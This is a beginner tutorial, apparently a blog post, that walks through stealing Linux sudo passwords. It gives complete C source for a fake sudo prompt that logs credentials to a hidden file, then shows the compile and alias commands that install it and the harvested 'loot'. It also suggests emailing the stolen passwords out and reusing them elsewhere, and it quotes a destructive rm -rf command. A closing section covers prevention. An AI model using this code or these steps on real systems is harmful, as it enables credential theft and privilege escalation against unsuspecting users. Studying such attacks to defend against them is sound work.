Introduction

This article is intended to be a beginner-friendly and comprehensive approach to analyzing a simple cyber attack. In this case, we will be writing a malicious C program and swapping a commonly-used and critical program with our malicious program to mimick a password prompt. Our attack aims to fool a victim user into entering their password into our malicious program, which stores the input in a hidden text file to be retrieved by the attacker.

Things You Can Learn from this Article

• What are computer privileges?
• How are privileges enforced in a computer system?
• What is privilege escalation?
• Common usage of the Linux command-line
• Tricking a user into giving away their password using fradulent programs
• Using the C Programming Language to: * Emulate program input and output * Create and write to files
• What is a Systems Administrator?
• What is an Attack Surface?
• What is an Attack Vector?

Why Steal passwords?

Managing who can do what on a computer is very important. No one wants an unwanted guest having complete access to their computer. For this reasons, computers have privileges in place to designate what actions a user may perform.

In Linux¹, there is a “superuser” account which has unrestricted access to commands, files, directories, and resources.² Most distributions³ of Linux allow non-superuser accounts to use the superuser’s abilities with the program sudo⁴.

The sudo program enables users to perform critical actions on the system from updating the packages (On debian-based distributions: sudo apt update) to even erasing every file on the system (sudo rm -rf --no-preserve-root /) to the point where the system can no longer run.

To use the sudo program, a user runs sudo followed by command or program they want to be run with superuser privileges, this usage be expressed as sudo [command or program]. For more detailed documentation on sudo as a program, you can view its manual online⁵ or run man sudo in a Linux command-line. After running the command, the user will be prompted to enter their password for using superuser privileges. Upon succesfully entering the password, sudo will run the command or program with superuser privileges.

Someone who wants to take over your Linux computer will want to obtain these superuser privileges. In cybersecurity, this is refered to as Privilege Escalation⁶. There’s many different ways you would achieve Privilege Escalation in a Linux system, stealing passwords is one of them.

How the Attack Will Be Done

In this scenario, we assume you are an attacker that has access to a user’s account but doesn’t know the user’s password for running sudo. There’s better more sophisticated ways⁷ of getting their password from this position as an attacker, though this method is simple and it tricks the victim user into supplying their credentials to a fraudulent program.

Some might consider this social engineering⁸, where an attacker convinces their victim to make unwise decisions. I would consider this attack the command-line equivalent of Evil Twin phishing⁹, as the user would not be able to distinguish the use of our malicious program from their typical use of sudo.

The premise of this attack is that any program found in the /usr/bin/ folder can be run without path /usr/bin/. Meaning, the sudo program that a user may use to elevate privileges can be found at /usr/bin/sudo. You can execute /usr/bin/sudo apt update -y the same as you would execute sudo apt update -y.

The alias command, found in most Linux systems, allows us to run any command under a specified alias. A common alias is alias ll='ls -alF', used to run a more detailed, vertical version of the ls command, which shows the contents of a certain directory. Assuming our fake program is located at /home/username/fakeprogram, we can alias ‘sudo’ to execute fakeprogram when the user means to run sudo.

This way, when they run sudo apt update, they will be running /home/username/fakeprogram apt update instead of /usr/bin/sudo.

In the example below, we use which sudo to determine where the sudo program is located in the system. We then alias the running of ‘sudo’ to run instead echo haha!, which simply outputs ‘haha!’ to the user’s command-line output. Running which sudo after aliasing ‘sudo’, we can see that the user wouldn’t suspect that the program sudo would be in a strange place. Rather, they would have to check their aliases using alias to find that they would be tricked into running a different program.

eric@ubuntu:~$ which sudo
/usr/bin/sudo
eric@ubuntu:~$ alias sudo='echo haha!'
eric@ubuntu:~$ which sudo
/usr/bin/sudo
eric@ubuntu:~$ alias
...
alias ll='ls -alF'
alias sudo='echo haha!'
eric@ubuntu:~$ sudo
haha!
eric@ubuntu:~$

Requirements for the Attack

• Access to a sudo user’s command-line

  • You can be physically present at the computer or logged in remotely from a protocol such as SSH¹⁰, VNC¹¹, or RDP¹².
  • To check that the account has sudo privileges, you can run the command groups to find which groups the user is in. Typically, a user in either the ‘admin’, ‘wheel’, or ‘sudo’ group will have rights for sudo.

• alias

  • This found in most Linux command-line interpreters.

• The ability to write a program and execute it

  • In our case will be writing a program in C, compiling it with gcc, and executing the program.

Performing the Attack

A quick outline of the attack:

1. Create a program to mimick the behavior of the sudo program
2. Use alias to replace the usage of sudo with our fake program
3. Wait for the victim to use our fake program.
4. Collect the information obtained by our fake program.

Example Program for Attack

#eric@ubuntu:~$ cat fakesudo.c 
#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]){
        char *password;
        int max_tries = 3;
        char prompt[100];
        sprintf(prompt, "[sudo] password for %s:", getlogin());

        FILE *file;
        file = fopen(".exfiltrated.txt","a");
        for(int i=0; i < max_tries; i++){
                password = getpass(prompt);
                fprintf(file,"%s:%s\n", getlogin(), password);
                printf("Sorry, try again.\n");
        }
        printf("sudo: %i incorrect password attempts\n",max_tries);
        fclose(file);

        return 0;// Safely Exit the Program
}

The above program creates a file named .exfiltrated.txt We place a “.” before the filename to indicate that we would like the file to be hidden. Hidden files and directories are only shown to users when specified through a command such as ls -a.

While prompting the user for their password to run sudo, we store their password input and write it to .exfiltrated.txt in the form of username:password. Even if user enters the ‘correct’ password, we pretend it’s invalid.

Now that the program is written, it’s time to compile the program, set the alias, wait for the victim to run sudo, then come back and read .exfiltrated.txt before anyone notices or the victim resets their password!

eric@ubuntu:~$ ls -a
.  ..  fakesudo.c
eric@ubuntu:~$ gcc fakesudo.c -o fakesudo # Compile program
eric@ubuntu:~$ alias sudo="/home/urza/fakesudo" # Set alias
eric@ubuntu:~$ sudo apt update # Victim runs fakesudo
[sudo] password for urza:
Sorry, try again.
[sudo] password for urza:
Sorry, try again.
[sudo] password for urza:
Sorry, try again.
sudo: 3 incorrect password attempts
eric@ubuntu:~$ ls -a # Show hidden and non-hidden files
.  ..  .exfiltrated.txt  fakesudo  fakesudo.c
eric@ubuntu:~$ cat .exfiltrated.txt # Show our loot! 
eric:password123
eric:Password123
eric:stupid computer, that IS my password!
eric@ubuntu:~$ 

Here we can see that the user entered ‘password123’, ‘Password123’, and ‘stupid computer, that IS my password!’ as their password when they were prompted as we can tell by the data stored inside of .exfiltrated.txt.

I must say, this attack is far from the best solution, as the user may become frustrated and decide to reset their password before you can apply your maliciously obtained knowledge. However, it never hurts to learn how your victim chooses their passwords. They may use the same password in other systems or services, (another good reason to use a password manager and use unique passwords! https://www.pcmag.com/picks/the-best-password-managers), which may give you more access you can leverage against your victim.

You may also choose to transmit the stolen credentials by writing a function to send the victim’s password to yourself via email, or however you wish to remotely send information to yourself from your victim’s computer.

Preventing this Attack

People who are responsible for maintaining the operation and integrity of a computer system and its contents are known as Systems Administrators, or ‘sysadmins’. It is up to people such as sysadmins to implement policies and rules in their systems to prevent undesired behavior. Sysadmins protect computer systems from malicious hackers, by limiting the ways an attacker can get into and abuse a system. These ways are known as attack surfaces and attack vectors.¹³

The requirements specified earlier for this attack can each be considered attack vectors, all of those vectors existing together can be considered an attack surface.

Let’s discuss how to prevent each of our attack vectors:

1. Access to a sudo user’s command-line
   • When an attacker has command-line access, also known as a ‘shell’, it is generally assumed that your entire system is compromised. Commonly you’ll see security researchers find exploits in a system to ‘pop a shell’, or obtain command-line access. Having access to even non-superuser privileges in a shell is generally assumed that the attacker can leverage their abilities to obtain superuser privileges through methods such as our alias attack. Instituting policies to limit who should have physical access can prevent physical attacks, though, whether or not you should worry about this depends on what your system’s “threat model”¹⁴, or rather who you expect will try to attack you and how they will try to attack you.
   • Setting policies for remote access is usually handled by establishing a Firewall¹⁵ to determine which remote connections are appropriate for your system, as well as configuring your services such as SSH¹⁰ as found in the ‘/etc/’ folder. In the case of SSH, its configuration file is found at ‘/etc/ssh/sshd_config’, where you can disable users from logging in to the superuser ‘root’ account by setting the PermitRootLogin parameter to ’no’.
2. alias
   • While alias isn’t the most popular attack vector, since it assumes you already have a shell to do more sophisticated or common attacks, this askubuntu post¹⁶ goes into detail on how to prevent abuse of the alias program. To summarize that post’s information, the post suggests to establish a standard configuration for users’ shells, so that any potentially malicious configurations such as malicious aliases are erased before they can affect victims.
3. Writing a program and executing it
   • You may have heard of “Read, Write, Execute”¹⁷ before. This describes users’ permissions in Linux systems. Every file and directory has permissions determining who can read its contents, write changes to its contents, and who can execute the files as programs. It is possible to set a whitelist of programs so that only certain programs can be executed, though that tends to be strict and if a user can’t be trusted to not write and execute malicious programs, it would probably be better to not let them be a user to begin with. This askubuntu post¹⁸ thoroughly covers the ways in which users can abuse their write and execute privileges, as well as methods to prevent these abuses.

Conclusion

There’s many ways to improve upon this attack. You could write it in a different programming language, be more discrete in stealing the information, however you see fit. My hope is that this article may has helped you learn more how malicious hackers operate, develop attacks, and how these attacks can be prevented.

Footnotes